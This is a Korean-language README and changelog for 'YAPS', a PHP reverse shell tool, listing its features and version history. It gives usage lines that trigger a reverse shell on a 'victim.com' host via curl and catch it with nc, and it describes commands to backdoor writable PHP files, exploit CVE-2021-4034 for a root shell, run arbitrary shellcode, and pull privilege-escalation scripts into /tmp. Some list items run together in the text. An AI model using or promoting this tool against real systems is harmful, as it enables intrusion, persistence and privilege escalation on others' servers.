
또 다른 PHP 셸 - 가장 완벽한 PHP 리버스 셸

네, 이름에서 알 수 있듯이 이것은 또 다른 PHP 리버스 셸입니다. 수백 개 중 하나이지만 몇 가지 장점이 있습니다. 단일 PHP 파일로 모든 기능을 포함하고 있으며, 간단한 TCP 리스너(예: nc -lp 1337)로 제어할 수 있습니다.
현재 버전(1.5)에서 주요 기능은 리눅스 시스템만 지원하지만, 윈도우에서도 작동하도록 만들 계획입니다.
현재 첫 번째 버전이며 아직 많이 테스트하지 않았고, 다음 버전을 위해 계획하고 개선할 사항이 많이 남아 있습니다 (아직 완료되지 않았습니다!), 그러니 버그를 발견하거나 기능이나 개선에 대한 제안이 있으면 알려주세요. =)
!interactive로 대화형 셸 생성 가능)
rlwrap nc -lp <ip> <port> 사용 시 가능)curl -x POST -d "x=ip:port" victim.com/yaps.php);yaps.php?s 또는 yaps.php?silent로 배너 숨기기 가능php yaps.php ip port 실행 가능!help - 도움말 메뉴 표시!all-colors - 모든 색상 전환 (무색 TTY 호환)!color - PS1 색상 전환 (로컬 전용, 환경 변수 변경 없음)!duplicate - 다른 YAPS 연결 생성!enum - LinPEAS와 LinEnum을 /tmp에 다운로드하고 사용 준비!info - 대상 정보 목록 (위에서 언급한 정보 수집)!infect - 쓰기 가능한 PHP 파일을 백도어로 감염!interactive - 다른 포트에서 대화형 리버스 셸 생성 (sudo, su, mysql 등과 함께 작동)!passwd - 비밀번호 옵션 (활성화, 비활성화, 설정, 수정)!php - 원격 호스트에서 PHP 작성 및 실행!pwnkit - CVE-2021-4034를 악용하여 루트 리버스 셸 생성 시도!shellcode - 원격 호스트에 셸코드 전송 및 실행





v1.5 - 2022-02-12
!shellcode 추가: 임의의 셸코드 수신 및 실행duplicate() 함수 개선 (이제 포트 범위 지정 가능)stabilize에서 interactive로 변경v1.4 - 2022-02-04
!pwnkit 추가: CVE-2021-4034 악용하여 루트 리버스 셸 생성verify_update() 함수 개선v1.3.1 - 2021-08-01
v1.3 - 2021-07-28
!infect 추가: PHP 파일에 백도어 감염!stabilize 페이로드 변경 (버그 수정)v1.2.2 - 2021-07-18
v1.2.1 - 2021-07-17
v1.2 - 2021-07-17
!duplicate 추가: 다른 셸 생성--update|-u)--help|-h)php yaps.php ip port)v1.1 - 2021-07-12
!all-colors 추가: 터미널 색상 전환 (무색 TTY에서 작동)exit 명령어 추가: 소켓 닫기 (셸 종료)!stabilize의 페이로드 변경: HISTSIZE 및 HISTFILE 설정 해제!info에서 CPU 및 메모리 정보 획득 방법 변경v1.0.1 - 2021-07-08
[x,y,z]를 array(x,y,z)로 변경: 이전 PHP 버전과의 호환성 개선일부 아이디어는 다음 도구에서 영감을 받았습니다:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!suggester - Linux Exploit Suggester를 /tmp에 다운로드하고 사용 준비

